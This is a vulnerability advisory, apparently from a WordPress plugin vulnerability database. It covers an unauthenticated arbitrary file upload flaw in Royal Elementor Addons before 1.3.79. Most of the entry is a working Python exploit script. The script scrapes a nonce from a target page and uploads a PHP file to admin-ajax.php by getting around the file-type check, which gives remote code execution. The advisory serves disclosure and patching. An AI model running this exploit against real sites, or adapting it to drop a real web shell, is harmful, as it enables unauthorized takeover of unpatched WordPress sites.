WordPress Plugin Vulnerabilities

Royal Elementor Addons and Templates < 1.3.79 - Unauthenticated Arbitrary File Upload

Description

The plugin does not properly validate uploaded files, which could allow unauthenticated users to upload arbitrary files, such as PHP and achieve RCE.

Proof of Concept

Make sure you have Elementor installed and a page or post edited with Elementor.

Here's the python script that will execute the exploit.

from io import StringIO
import requests
from urllib import parse
import json
import sys
import re
import io

if len(sys.argv) != 2:
	print('USAGE: python %s <target_elementor_page>' % (sys.argv[0],))
	sys.exit()

elementor_url = sys.argv[1].rstrip('/')
parsed_url = parse.urlparse(elementor_url)
root_url = f'{parsed_url.scheme}://{parsed_url.netloc}'

with requests.Session() as s:
	print('# Getting nonce..')
	page = s.get(elementor_url).text
	nonce = re.search(r'WprConfig = \{.*"nonce":"([a-f0-9]+)"', page).groups()
	if len(nonce) == 0:
		print('Error: Couldn\'t get nonce.')
		sys.exit()
	nonce = nonce[0]

	print('# Uploading shell..')
	shell = io.BytesIO(b'<?php phpinfo();')
	data = {
		'wpr_addons_nonce': nonce,
		'max_file_size': 100,
		'allowed_file_types': ',',
		'action': 'wpr_addons_upload_file',
		'triggering_event': 'click',
	}
	file = {
		'uploaded_file': ('phpinfo.php.', shell),
	}
	print(requests.post(f'{root_url}/wp-admin/admin-ajax.php', data=data, files=file).text)


Affects Plugins

Fixed in 1.3.79

References

Miscellaneous

Original Researcher
Fioravante Souza
Submitter
Fioravante Souza
Verified
Yes

Timeline

Publicly Published
2023-10-09 (about 7 months ago)
Added
2023-10-09 (about 7 months ago)
Last Updated
2023-10-09 (about 7 months ago)

Other